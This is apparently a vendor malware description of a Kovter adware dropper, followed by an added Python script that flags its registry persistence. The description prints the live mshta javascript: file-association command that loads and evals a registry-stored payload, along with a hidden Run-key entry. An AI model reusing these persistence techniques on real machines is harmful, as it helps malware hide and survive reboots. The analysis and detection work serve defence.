SHA1:
- aef75ada634aa2b2447a3a6502645b74b1e9e018
A detection for Trojan.MulDrop6.42771, a dropper Trojan whose payload is Trojan.Kovter.118. Trojan.Kovter can be classed as an adware Trojan: it runs several Microsoft Internet Explorer windows simultaneously, visits websites specified by the virus makers and generates traffic for them by following advertising links and banners. In this way the attackers make money from affiliate programs and advertisers.
When launched, it creates the following files:
- C:\Users\<username>\AppData\Local\ea3e65
- C:\Users\<username>\AppData\Local\ea3e65\683149.2c1a69e
- C:\Users\<username>\AppData\Local\ea3e65\283804.bat
- C:\Users\<username>\AppData\Local\ea3e65\02962c.lnk
The 02962c.lnk file is a shortcut to the batch file C:\Users\<username>\AppData\Local\ea3e65\283804.bat, which contains the following line:
start "" "C:\Users\<username>\AppData\Local\ea3e65\683149.2c1a69e"
Information about the LNK file is written to the Windows system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"\0vhnwb" = "C:\Users\<username>\AppData\Local\ea3e65\02962c.lnk"
The name of the entry contains non-printable characters, so regedit cannot display it.
Then it creates two more files:
- C:\Users\<username>\AppData\Roaming\01cd05\150b33.2c1a69e
- C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c652e1.lnk
This LNK file points to C:\Users\<username>\AppData\Roaming\01cd05\150b33.2c1a69e.
The 683149.2c1a69e and 150b33.2c1a69e files contain random data; both carry the same extension and serve only as triggers to launch Trojan.Kovter.
Finally, the Trojan creates a file association for that extension in the system registry:
[HKCR\.2c1a69e]
@="bf1570\0"
[HKCR\bf1570\shell\open\command]
@="mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";""
Opening any file with the .2c1a69e extension therefore starts mshta with an inline javascript: URI. The script reads the HKCU\software\isidaqnf\amqoasyj registry value through WScript.Shell.RegRead and passes its contents to eval, so the actual Kovter code lives in the registry rather than in the trigger files, which explains why those files can hold random data.
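The persistence pattern above (a Run entry whose name contains non-printable characters, and a file-type handler that launches mshta on an inline javascript: URI which reads its payload from a registry value) can be audited from a collected list of registry values. The script below is an added example, not part of the Dr.Web description; the SAMPLE_ENTRIES list is constructed from the keys this page lists, and the user name, ProgID paths and the OneDrive/notepad entries are assumptions standing in for output of a registry collector.

```python
import re

# Constructed sample entries modelled on this page's indicators, as (key, value_name, data),
# the shape a collector built on winreg.EnumValue or a parsed .reg export would hand over.
SAMPLE_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "\0vhnwb",
     r"C:\Users\alice\AppData\Local\ea3e65\02962c.lnk"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (r"HKCR\.2c1a69e", "", "bf1570"),
    (r"HKCR\bf1570\shell\open\command", "",
     'mshta "javascript:n7x=new ActiveXObject("WScript.Shell");'
     'j1ZSp8=n7x.RegRead("HKCU\\\\software\\\\isidaqnf\\\\amqoasyj");eval(j1ZSp8);"'),
    (r"HKCR\txtfile\shell\open\command", "", r"%SystemRoot%\system32\NOTEPAD.EXE %1"),
]

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# A file-type handler that starts mshta on an inline javascript: URI is never a normal setup.
MSHTA_JS = re.compile(r"\bmshta\b.*javascript:", re.IGNORECASE)
REGREAD_ARG = re.compile(r'RegRead\("([^"]+)"\)')


def regread_paths(command):
    """Return the registry values an inline script loads with WScript.Shell.RegRead.
    JScript escapes backslashes, so "HKCU\\\\x" in the value data is the path HKCU\\x."""
    return [p.replace("\\\\", "\\") for p in REGREAD_ARG.findall(command)]


def audit_entries(entries):
    """Return (rule, key, value_name, detail) tuples for the persistence patterns above."""
    findings = []
    for key, name, data in entries:
        k = key.lower()
        if k.endswith(r"\currentversion\run") and CONTROL_CHARS.search(name):
            # Non-printable characters in the value name hide the entry from regedit's listing;
            # escape them so the finding itself is readable.
            findings.append(("run-entry-unprintable-name", key,
                             name.encode("unicode_escape").decode(), data))
        elif k.endswith(r"\shell\open\command") and MSHTA_JS.search(data):
            # Record where the script fetches its real payload so a responder can collect it.
            findings.append(("file-association-mshta", key, name, regread_paths(data)))
    return findings


if __name__ == "__main__":
    for rule, key, name, detail in audit_entries(SAMPLE_ENTRIES):
        print(f"{rule}: [{key}] {name!r} -> {detail}")
```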